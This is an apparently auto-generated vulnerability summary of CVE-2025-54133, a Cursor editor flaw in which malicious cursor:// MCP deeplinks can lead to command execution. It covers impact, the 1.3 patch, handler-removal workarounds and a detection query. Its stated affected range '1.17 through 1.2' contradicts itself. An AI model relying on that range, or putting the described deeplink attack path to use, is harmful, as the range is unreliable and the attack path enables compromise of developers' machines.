CVE-2025-54133
📋 TL;DR
Cursor code editor versions 1.17 through 1.2 contain a UI information disclosure vulnerability in the MCP deeplink handler that allows attackers to execute arbitrary system commands through social engineering. Users who click malicious cursor:// links and proceed through installation dialogs can have commands executed on their machines. This affects all users running vulnerable versions of Cursor.
💻 Affected Systems
- Cursor
📦 What is this software?
Cursor by Anysphere
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise through arbitrary command execution, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Attackers trick users into clicking malicious links via phishing/social engineering, then execute commands to steal credentials, install malware, or exfiltrate sensitive data.
If Mitigated
Limited impact if users are trained to avoid suspicious links and proper endpoint security controls are in place to detect malicious command execution.
🎯 Exploit Status
Exploitation requires user interaction (2 clicks) but is straightforward once a malicious link is crafted and delivered via social engineering.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3
Vendor Advisory: https://github.com/cursor/cursor/security/advisories/GHSA-r22h-5wp2-2wfv
Restart Required: Yes
Instructions:
1. Open Cursor editor. 2. Go to Settings/About. 3. Check current version. 4. If below 1.3, update to version 1.3 or higher through built-in update mechanism or download from official source. 5. Restart Cursor after update.
🔧 Temporary Workarounds
Disable deeplink protocol handler
allRemove or disable the cursor:// protocol handler registration in your operating system
Windows: reg delete HKCU\Software\Classes\cursor /f
macOS: defaults delete com.todesktop.230313mzl
Linux: Check ~/.config/mimeapps.list and remove cursor:// entries
Use web browser link warnings
allConfigure browsers to warn about or block cursor:// protocol links
🧯 If You Can't Patch
- Train users to never click cursor:// links from untrusted sources
- Implement application allowlisting to prevent execution of unauthorized commands
🔍 How to Verify
Check if Vulnerable:
Open Cursor, go to Settings/About, check if version is between 1.17 and 1.2 inclusiveCheck Version:
Cursor shows version in About dialog; no CLI command availableVerify Fix Applied:
Confirm version is 1.3 or higher in Settings/About📡 Detection & Monitoring
Log Indicators:
- Process execution logs showing unexpected commands following cursor:// protocol activation
- Security logs showing cursor:// protocol handler execution
Network Indicators:
- Network connections initiated by Cursor to unexpected destinations following link clicks
SIEM Query:
Process execution where parent_process contains 'cursor' AND command_line contains suspicious patterns